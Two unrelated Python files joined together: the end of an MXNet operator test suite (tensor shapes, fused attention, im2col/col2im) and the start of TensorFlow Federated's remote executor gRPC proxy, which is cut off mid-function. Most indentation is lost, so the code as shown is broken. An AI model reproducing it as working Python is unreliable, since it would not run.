check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
            assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
            high = 1
            assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
    num_heads = 3  # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
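    # The first graph below uses the fused contrib.interleaved_matmul_selfatt_* operators; the
    # second graph rebuilds the same attention with FullyConnected / batch_dot / reshape /
    # transpose, and the test asserts that outputs, attention scores and gradients match.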
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
    num_heads = 3  # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
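# Worked example (illustrative only, not used by the assertions below): with
# spatial=30, kernel=3, stride=2, dilate=2, pad=1 the helper above computes
# pad_size = 30 + 2*1 = 32 and dilated_kernel = 2*(3-1) + 1 = 5, giving an
# output size of (32 - 5) // 2 + 1 = 14, the standard convolution
# output-size formula.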
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
if __name__ == '__main__':
import nose
nose.runmodule()
|
remote_executor.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import itertools
import queue
import threading
import weakref
import absl.logging as logging
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import anonymous_tuple
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl import executor_service_utils
from tensorflow_federated.python.core.impl.executors import execution_context
from tensorflow_federated.python.core.impl.executors import executor_base
from tensorflow_federated.python.core.impl.executors import executor_value_base
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref: executor_pb2.ValueRef, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
# Clean up the value and the memory associated with it on the remote
# worker when no references to it remain.
def finalizer(value_ref, executor):
executor._dispose(value_ref) # pylint: disable=protected-access
weakref.finalize(self, finalizer, value_ref, executor)
@property
def type_signature(self):
return self._type_signature
@tracing.trace(span=True)
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._stub = stub
self._thread_pool_executor = thread_pool_executor
self._is_initialized = False
def _lazy_init(self):
"""Lazily initialize the underlying gRPC stream."""
if self._is_initialized:
return
logging.debug('Initializing bidi stream')
self._request_queue = queue.Queue()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
def request_iter():
"""Iterator that blocks on the request Queue."""
for seq in itertools.count():
logging.debug('Request thread: blocking for next request')
val = self._request_queue.get()
if val:
py_typecheck.check_type(val[0], executor_pb2.ExecuteRequest)
py_typecheck.check_type(val[1], threading.Event)
req = val[0]
req.sequence_number = seq
logging.debug(
'Request thread: processing request of type %s, seq_no %s',
val[0].WhichOneof('request'), seq)
self._response_event_dict[seq] = val[1]
yield val[0]
else:
logging.debug(
'Request thread: Final request received. Stream will close.')
# None means we are done processing
return
response_iter = self._stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('Response thread: blocking for next response')
for response in response_iter:
logging.debug(
'Response thread: processing response of type %s, seq_no %s',
response.WhichOneof('response'), response.sequence_number)
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except grpc.RpcError as error:
logging.exception('Error calling remote executor: %s', error)
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
self._is_initialized = True
@tracing.trace(span=True)
async def send_request(self, request):
"""Send a request on the bidi stream."""
self._lazy_init()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put((request, response_event))
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response # pytype: disable=attribute-error
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
if self._is_initialized:
logging.debug('Closing bidi stream')
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
else:
logging.debug('Closing unused bidi stream')
self._is_initialized = False
def _request(rpc_func, request):
with tracing.wrap_rpc_in_trace_context():
try:
return rpc_func(request)
except grpc.RpcError as e:
if _is_retryable_grpc_error(e):
